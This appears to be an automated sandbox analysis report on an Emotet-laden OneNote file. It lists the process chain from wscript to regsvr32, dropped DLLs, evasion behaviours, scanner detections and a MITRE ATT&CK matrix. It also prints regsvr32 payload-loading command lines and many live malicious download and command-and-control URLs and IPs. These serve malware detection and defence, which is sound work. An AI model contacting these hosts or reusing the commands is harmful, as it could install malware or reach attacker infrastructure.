Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\CRCPqQPgWxqcgJu\zBLf.dll"
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\CRCPqQPgWxqcgJu\zBLf.dll"	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

File created: C:\Users\user\Documents\{F00B6BB3-41EE-4892-B100-C863D7550BEA}

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

File created: C:\Users\user\AppData\Local\Temp\{2EB17D8E-6B60-400B-AE6E-E660500E7C76} - OProcSessId.dat

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winONE@9/11@1/49

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

File read: C:\Program Files (x86)\desktop.ini

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 3_2_00738BC8 Process32FirstW,CreateToolhelp32Snapshot,FindCloseChangeNotification,

3_2_00738BC8

Source: C:\Windows\SysWOW64\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source:	Binary string: ain.pdb source: OneNote15WatsonLog.etl.0.dr
Source:	Binary string: P:\Target\x86\ship\onenote\x-none\onmain.pdbain.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: OneNote15WatsonLog.etl.0.dr
Source:	Binary string: P:\Target\x86\ship\onenote\x-none\onmain.pdb source: OneNote15WatsonLog.etl.0.dr

Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180005C69 push rdi; ret	3_2_0000000180005C72
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00000001800056DD push rdi; ret	3_2_00000001800056E4
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0073A0FC push ebp; iretd	3_2_0073A0FD
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_007480D7 push ebp; retf	3_2_007480D8
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00736CDE push esi; iretd	3_2_00736CDF
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00736C9F pushad ; ret	3_2_00736CAA
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00739D51 push ebp; retf	3_2_00739D5A
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00748157 push ebp; retf	3_2_00748158
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00747D4E push ebp; iretd	3_2_00747D4F
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00747D3C push ebp; retf	3_2_00747D3D
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00747D25 push 4D8BFFFFh; retf	3_2_00747D2A
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0073A1D2 push ebp; iretd	3_2_0073A1D3
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00747987 push ebp; iretd	3_2_0074798F
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0073A26E push ebp; ret	3_2_0073A26F
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00747EAF push 458BCC5Ah; retf	3_2_00747EBC
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00739E8B push eax; retf	3_2_00739E8E
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0074C731 push esi; iretd	3_2_0074C732
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024BC731 push esi; iretd	4_2_024BC732
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A6CDE push esi; iretd	4_2_024A6CDF
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024A6C9F pushad ; ret	4_2_024A6CAA
Source: C:\Windows\System32\regsvr32.exe	Code function: 4_2_024C6D34 push edi; ret	4_2_024C6D36

Source: rad0767A.tmp.dll.1.dr

Static PE information: section name: _RDATA

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll

Source: C:\Windows\SysWOW64\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll			Jump to dropped file
Source: C:\Windows\System32\regsvr32.exe	File created: C:\Windows\System32\CRCPqQPgWxqcgJu\zBLf.dll (copy)			Jump to dropped file

Source: C:\Windows\System32\regsvr32.exe

File created: C:\Windows\System32\CRCPqQPgWxqcgJu\zBLf.dll (copy)

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\System32\regsvr32.exe

File opened: C:\Windows\system32\CRCPqQPgWxqcgJu\zBLf.dll:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe TID: 6104	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 6108	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 4916	Thread sleep time: -270000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

API coverage: 8.0 %

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 3_2_0000000180008D28 FindFirstFileExW,

3_2_0000000180008D28

Source: C:\Windows\System32\regsvr32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: wscript.exe, 00000001.00000002.410578428.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406123541.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405806973.0000000005A15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406246546.0000000005A1E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410685138.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395243756.0000000005A0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407893232.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395243756.0000000005A4B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000BFD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632896008.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: regsvr32.exe, 00000004.00000003.631909957.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.632896008.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.487960749.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631718503.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488247540.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.488515239.0000000000C41000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.631367209.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh9

Source: C:\Windows\System32\regsvr32.exe

Code function: 3_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_0000000180001C48

Source: C:\Windows\System32\regsvr32.exe

Code function: 3_2_000000018000A878 GetProcessHeap,

3_2_000000018000A878

Source: C:\Windows\System32\regsvr32.exe

Code function: 3_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,

3_2_0000000180010C10

Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0000000180001C48
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00000001800082EC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00000001800082EC
Source: C:\Windows\System32\regsvr32.exe	Code function: 3_2_00000001800017DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00000001800017DC

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe	Network Connect: 164.90.222.65 443	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Network Connect: 203.26.41.131 443	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Domain query: penshorn.org
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 66.228.32.31 7080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 187.63.160.88 80	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 104.168.155.143 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 91.121.146.47 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 160.16.142.56 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 182.162.143.56 443	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 167.172.199.165 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 163.44.196.120 8080	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 3_2_00000001800070A0 cpuid

3_2_00000001800070A0

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 3_2_0000000180001D98 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

3_2_0000000180001D98

Stealing of Sensitive Information

Yara detected Malicious OneNote

Source: Yara match

File source: Insight_Medical_Publishing.one, type: SAMPLE

Yara detected Emotet

Source: Yara match	File source: 00000004.00000002.632774627.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.regsvr32.exe.2470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.regsvr32.exe.2470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.700000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.633268738.00000000024A1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.633113023.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.394237603.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Malicious OneNote

Source: Yara match

File source: Insight_Medical_Publishing.one, type: SAMPLE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scripting	1 DLL Side-Loading	111 Process Injection	21 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Exploitation for Client Execution	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Virtualization/Sandbox Evasion	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	111 Process Injection	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Scripting	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	3 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Hidden Files and Directories	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	114 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Obfuscated Files or Information	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Regsvr32	DCSync	25 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Insight_Medical_Publishing.one	31%	ReversingLabs	Script-WScript.Trojan.OneNote
Insight_Medical_Publishing.one	41%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll	58%	ReversingLabs	Win64.Trojan.Emotet
C:\Windows\System32\CRCPqQPgWxqcgJu\zBLf.dll (copy)	58%	ReversingLabs	Win64.Trojan.Emotet

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
4.2.regsvr32.exe.2470000.0.unpack	100%	Avira	HEUR/AGEN.1215476		Download File
3.2.regsvr32.exe.700000.0.unpack	100%	Avira	HEUR/AGEN.1215476		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://penshorn.org/	0%	Avira URL Cloud	safe
https://bbvoyage.com/useragreem	0%	Avira URL Cloud	safe
https://91.121.146.47:8080/jesecsgigcdk/zfgrij/wjhswvhm/D	100%	Avira URL Cloud	malware
https://penshorn.org/admin/Ses8712iGR8du/	100%	Avira URL Cloud	malware
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/	100%	Avira URL Cloud	malware
http://ozmeydan.com/cekici/9/	100%	Avira URL Cloud	malware
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM	100%	Avira URL Cloud	malware
https://www.gomespontes.com.br/logs/pd/	100%	Avira URL Cloud	malware
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0	100%	Avira URL Cloud	malware
https://penshorn.org/admin/Ses8712iGR8du/tM	100%	Avira URL Cloud	malware
http://softwareulike.com/cWIYxWMPkK/	100%	Avira URL Cloud	malware
https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM	100%	Avira URL Cloud	malware
https://163.44.196.120:8080/jesecsgigcdk/zfgrij/wjhswvhm/	100%	Avira URL Cloud	malware
https://160.16.142.56:8080/jesecsgigcdk/zfgrij/wjhswvhm/	0%	Avira URL Cloud	safe
http://softwareulike.com/cWIYxWMPkK/yM	100%	Avira URL Cloud	malware
https://182.162.143.56/jesecsgigcdk/zfgrij/wjhswvhm/	100%	Avira URL Cloud	malware
https://91.121.146.47:8080/	100%	Avira URL Cloud	malware
https://163.44.196.120:8080/	100%	Avira URL Cloud	malware
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/D	100%	Avira URL Cloud	malware
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/	100%	Avira URL Cloud	malware
https://164.90.222.65:443/jesecsgigcdk/zfgrij/wjhswvhm/	100%	Avira URL Cloud	malware
https://penshorn.org/admin/Ses8712iGR8du/:	100%	Avira URL Cloud	malware
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dllG	100%	Avira URL Cloud	malware
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6	100%	Avira URL Cloud	malware
https://163.44.196.120:8080/a	100%	Avira URL Cloud	malware
https://www.gomespontes.com.br/logs/pd/vM	100%	Avira URL Cloud	malware
https://www.gomespontes.com.br/logs/pd/RPROFIN	100%	Avira URL Cloud	malware
https://160.16.142.56:8080/jesecsgigcdk/zfgrij/wjhswvhm/~	0%	Avira URL Cloud	safe
http://ozmeydan.com/cekici/9/xM	100%	Avira URL Cloud	malware
https://167.172.199.165:8080/jesecsgigcdk/zfgrij/wjhswvhm/	100%	Avira URL Cloud	malware
https://167.172.199.165:8080/	100%	Avira URL Cloud	malware
https://www.gomespontes.com.br/logs/pd/RPROFII	100%	Avira URL Cloud	malware
https://91.121.146.47:8080/jesecsgigcdk/zfgrij/wjhswvhm/	100%	Avira URL Cloud	malware
https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dll	100%	Avira URL Cloud	malware
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM	100%	Avira URL Cloud	malware
https://penshorn.org/l	0%	Avira URL Cloud	safe
https://penshorn.org/admin/Ses8712iGR8du/o8	100%	Avira URL Cloud	malware
https://167.172.199.165:8080/&C	100%	Avira URL Cloud	malware
https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/	100%	Avira URL Cloud	malware
https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/LE=C:	100%	Avira URL Cloud	malware
https://160.16.142.56:8080/	0%	Avira URL Cloud	safe
https://penshorn.org:443/admin/Ses8712iGR8du/script.createobject(	100%	Avira URL Cloud	malware
https://160.16.142.56:8080/jesecsgigcdk/zfgrij/wjhswvhm/Low	0%	Avira URL Cloud	safe
https://164.90.222.65/jesecsgigcdk/zfgrij/wjhswvhm/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
penshorn.org	203.26.41.131	true	true		unknown
c-0001.c-msedge.net	13.107.4.50	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://penshorn.org/admin/Ses8712iGR8du/	true	Avira URL Cloud: malware	unknown
https://182.162.143.56/jesecsgigcdk/zfgrij/wjhswvhm/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://ozmeydan.com/cekici/9/	wscript.exe, wscript.exe, 00000001.00000003.401446574.0000000005854000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407388348.000000000599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405516131.00000000059E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398089051.0000000005618000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396833968.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410110561.000000000554B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410578428.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399855918.0000000005710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398372214.0000000005612000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401334096.00000000057A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396123966.00000000054E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400492446.000000000571C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402856743.0000000005824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401938541.000000000587B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402160739.0000000005881000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396886242.0000000005520000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://softwareulike.com/cWIYxWMPkK/	wscript.exe, wscript.exe, 00000001.00000003.401446574.0000000005854000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407388348.000000000599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405516131.00000000059E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398089051.0000000005618000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396833968.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410110561.000000000554B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410578428.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399855918.0000000005710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398372214.0000000005612000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401334096.00000000057A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396123966.00000000054E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400492446.000000000571C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402856743.0000000005824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401938541.000000000587B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402160739.0000000005881000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396886242.0000000005520000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://penshorn.org/	wscript.exe, 00000001.00000003.406246546.0000000005A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410615490.0000000005A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395243756.0000000005A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407565832.0000000005A30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM	wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.gomespontes.com.br/logs/pd/	wscript.exe, wscript.exe, 00000001.00000003.401446574.0000000005854000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.407388348.000000000599C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404069943.00000000058F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405516131.00000000059E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398089051.0000000005618000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396833968.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397954690.0000000005570000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410110561.000000000554B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404879615.000000000595C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.410578428.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399855918.0000000005710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.398372214.0000000005612000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401334096.00000000057A4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396123966.00000000054E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400492446.000000000571C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.404550473.0000000005941000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402856743.0000000005824000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401938541.000000000587B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.402160739.0000000005881000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.396886242.0000000005520000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://penshorn.org/admin/Ses8712iGR8du/tM	wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0	wscript.exe, 00000001.00000003.406411067.0000000005164000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
